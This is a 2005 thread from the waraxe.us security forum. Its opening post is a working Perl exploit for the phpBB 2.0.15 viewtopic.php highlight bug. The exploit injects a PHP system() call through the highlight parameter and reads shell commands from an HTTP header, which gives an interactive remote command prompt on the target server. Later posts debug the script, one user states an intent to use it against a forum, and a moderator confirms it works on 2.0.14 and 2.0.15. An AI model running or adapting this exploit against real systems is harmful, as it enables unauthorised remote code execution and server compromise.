Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 18, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 231
Members: 0
Total: 231
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.15 -re-bug in viewtopic.php
Post new topic  Reply to topic View previous topic :: View next topic 
phpBB 2.0.15 -re-bug in viewtopic.php
PostPosted: Thu Jun 30, 2005 8:42 am Reply with quote
zain
Beginner
Beginner
 
Joined: Apr 18, 2005
Posts: 3




New exploit for previously discovered highlight bug...


Code:

#!/usr/bin/perl
# Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net
#
# phpBB 2.0.15 -re-bug in viewtopic.php


# The complete Open Source Development with CVS: GNU General Public License
# Book on using CVS effectively <--------- cvs, is also GPL
# or http://www.google.es/search?q=programming+howto
#
# BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
#
#
# Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
# You can start typing commands.
# Tested in BSD. Theo.. it works!
#
# !dSR: que todos los hackers digan YO!!
#
#


use strict;
use IO::Socket;

unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }

$ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
my ($server, $port) = split (/:/,$1);
$port = 80 unless defined($port);
$server = $1 unless defined($server);
my ($url, $command) = $2;

print "$server - $port - $url\n";

while () {
print "phpBB2.0.15> ";
while(<STDIN>) {
$command=$_;
chomp($command);
last;
}
&send($command);
}

sub send {
my $ok = 0;
my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
"Host: $server\nPHP: $cmd\n\n\n\n";
my $socket = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "can't connect to: $server : $@\n";
print $socket $string;
while(<$socket>) {
if (/#PHPBBEXPLOIT#/) {
close($socket) and last if $ok eq 2;
$ok++;
next;
}
print if $ok eq "1";
}
}
exit 0;


Can anyone get this to work? I ran it, and it gives me a phpBB2.0.15> prompt, but no matter what command I try it returns nothing.
View user's profile Send private message
PostPosted: Thu Jun 30, 2005 8:48 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Are you using BSD?

Its says:
Quote:
# Tested in BSD. Theo.. it works!
Question

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Jun 30, 2005 1:17 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




Quote:
Can anyone get this to work? I ran it, and it gives me a phpBB2.0.15> prompt, but no matter what command I try it returns nothing.



Same here :/
View user's profile Send private message
PostPosted: Thu Jun 30, 2005 1:21 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




common shaitan.. its just a little fix.. needed

try to delete # in \#PHPBBEXPLOIT#\ and /#PHPBBEXPLOIT#/ see what u get Crying or Very sad
View user's profile Send private message Visit poster's website
PostPosted: Thu Jun 30, 2005 1:40 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




emmm i get

Code:


Bareword found where operator expected at ./test line 48, near ""echo /"PHPBBEXPLOIT"
        (Missing operator before PHPBBEXPLOIT?)
Bareword found where operator expected at ./test line 48, near "";echo /"PHPBBEXPLOIT"
        (Missing operator before PHPBBEXPLOIT?)
syntax error at ./test line 48, near ""echo /"PHPBBEXPLOIT"
Execution of ./test aborted due to compilation errors.

View user's profile Send private message
PostPosted: Thu Jun 30, 2005 1:49 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




Code:
my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";


to
Code:
my $cmd = "echo \"PHPBBEXPLOIT\";".$_[0].";echo \"PHPBBEXPLOIT\"";


and
Code:
if (/#PHPBBEXPLOIT#/) {


to
Code:
if (/PHPBBEXPLOIT/) {


Crying or Very sad
View user's profile Send private message Visit poster's website
PostPosted: Thu Jun 30, 2005 1:53 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




it's like the same before fixes

Code:
user@site:~$ ./test http://site.com/forum/viewtopic.php?t=1
site.com - 80 - forum/viewtopic.php?t=1
phpBB2.0.15>


And stuck :/
View user's profile Send private message
PostPosted: Thu Jun 30, 2005 1:56 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




http://site.com

exist or not ?? of course not working
View user's profile Send private message Visit poster's website
PostPosted: Thu Jun 30, 2005 2:01 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




no just have changetd the url some forum that i wanna try to exploit
View user's profile Send private message
PostPosted: Thu Jun 30, 2005 5:24 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




I dont actually like Perl..... Php is my replacement and Im still learning my C and C++ so CGIs arnt all that popular with me yet. But Perl will never happen for me.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Jun 30, 2005 5:57 pm Reply with quote
diaga
Regular user
Regular user
 
Joined: Jun 27, 2005
Posts: 22




-bash-2.05b$ ./asdf.pl http://xxx.xxx.xxx.xxx/board
: bad interpreter: No such file or directory


LINUX: men not add url
View user's profile Send private message
PostPosted: Fri Jul 01, 2005 1:55 am Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




this code original in perl work for 2.0.14 and 2.0.15 work nice

not work: if server have disable functions > exec,system,passthru,shell_exec or safe mode enabled
View user's profile Send private message Visit poster's website
phpBB 2.0.15 -re-bug in viewtopic.php
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.061 Seconds